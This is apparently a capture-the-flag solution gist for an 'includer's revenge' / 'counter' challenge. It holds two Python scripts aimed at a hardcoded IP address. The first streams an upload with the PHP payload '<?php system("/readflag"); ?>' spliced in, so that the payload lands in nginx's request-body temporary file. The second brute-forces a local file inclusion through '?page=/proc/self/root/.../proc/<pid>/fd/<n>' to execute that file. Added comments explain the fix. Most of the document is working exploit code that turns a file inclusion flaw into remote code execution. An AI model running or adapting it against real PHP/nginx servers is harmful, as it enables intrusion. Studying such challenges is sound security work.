includer's revenge and counter solution - script written for counter, but its idea can be used for includer's revenge too - run both scripts at once - /tmp/b has a chunked body with random content - Including nginx temporary file
#!/usr/bin/env python3
# Sender half of the two-script solution described in the gist header; the
# second script is meant to run at the same time.
#
# What it does: in an endless loop it opens a raw TCP connection to the
# challenge host and streams a pre-captured HTTP upload (read from /tmp/g) in
# 100-byte slices, splicing a short PHP snippet into every slice after the
# first eleven. Per the gist description, the point is the temporary file
# nginx creates for the request body.
#
# Defender's view: this only matters when the application behind nginx passes
# a request-controlled path to include/require. Fix that at the source by
# mapping the parameter onto a fixed allowlist of templates. As defence in
# depth, confine PHP with open_basedir and run the PHP workers under a
# different account from nginx, which typically keeps nginx's open
# descriptors out of their reach.
#
# NOTE(review): the page lost all indentation; the nesting below is
# reconstructed and should be checked against the original gist.
from pwn import remote
import time  # not used anywhere in this script

# fill /tmp/g with `nc -lvnp 9000 > /tmp/g` and then `curl localhost:9000 -F a=@/dev/urandom`
q = open("/tmp/g","rb")  # handle is never closed; it lives until the process exits
z = q.read(1024 * 1024 * 10)  # read at most 10 MiB of the captured request

while(True):
    p = remote("49.12.232.139",8008)
    # 1000 slices of 100 bytes: only the first 100,000 bytes of z are ever sent.
    for i in range(1000):
        tosend = z[i*100:i*100+100]
        if(i > 10):
            # Slices 0-10 go out untouched, presumably so the captured request
            # line and headers stay intact (assumption; /tmp/g is not shown).
            tosend = tosend  # no-op kept from the original
            # Keep the first 29 bytes of the slice and replace the rest with PHP.
            tosend = tosend[:29]+b'<?php system("/readflag"); ?>'
        p.send(tosend)
    p.close()
#!/usr/bin/env python3 | |
import requests | |
while(True): | |
for k in range(36,38): | |
for j in range(10,40): | |
r = requests.get("http://49.12.232.139:8008/?page=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/"+str(k)+"/fd/"+str(j)) | |
if(len(r.text) > 0 ): | |
print("IT WORKS!") | |
print(r.text) |